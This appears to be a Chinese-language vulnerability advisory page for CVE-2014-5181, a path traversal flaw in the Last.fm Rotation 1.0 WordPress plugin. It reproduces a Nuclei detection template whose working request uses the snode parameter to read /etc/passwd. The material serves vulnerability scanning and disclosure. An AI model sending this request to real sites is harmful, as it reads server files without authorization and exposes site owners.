CVE-2014-5181: Last.fm Rotation 1.0 - Path Traversal

日期: 2025-08-01 | 影响软件: Last.fm Rotation 1.0 | POC: 已公开

漏洞描述

Directory traversal vulnerability in lastfm-proxy.php in the Last.fm Rotation (lastfm-rotation) plugin 1.0 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the snode parameter.

PoC代码[已公开]

id: CVE-2014-5181

info:
  name: Last.fm Rotation 1.0 - Path Traversal
  author: DhiyaneshDK
  severity: medium
  description: |
    Directory traversal vulnerability in lastfm-proxy.php in the Last.fm Rotation (lastfm-rotation) plugin 1.0 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the snode parameter.
  impact: |
    Remote attackers can read arbitrary files on the server, potentially leading to information disclosure or further exploitation.
  remediation: |
    Update to the latest version of the plugin or apply security patches to fix the vulnerability.
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2014-5181
    cwe-id: CWE-22
    epss-score: 0.00991
    epss-percentile: 0.76442
    cpe: cpe:2.3:a:last.fm_rotation_plugin_project:lastfm-rotation_plugin:1.0:*:*:*:*:wordpress:*:*
  metadata:
    vendor: last.fm_rotation_plugin_project
    product: lastfm-rotation_plugin
    framework: wordpress
  tags: wpscan,cve,cve2014,wp-cross-rss,wordpress,wp-plugin,lfi,wp,lastfm-rotation,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"/wp-content/plugins/lastfm-rotation/")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-content/plugins/lastfm-rotation/lastfm-proxy.php?snode=/etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a004630440220552bbf5a609b564e226e6d43ea0e2800c676436c2116338115630ffd264c1e40022030a9287e9751824acc12913fdb6da75358ce9c147863c6dbd3e9bff8accf2d7e:922c64590222798bb761d5b6d8e72950

相关漏洞推荐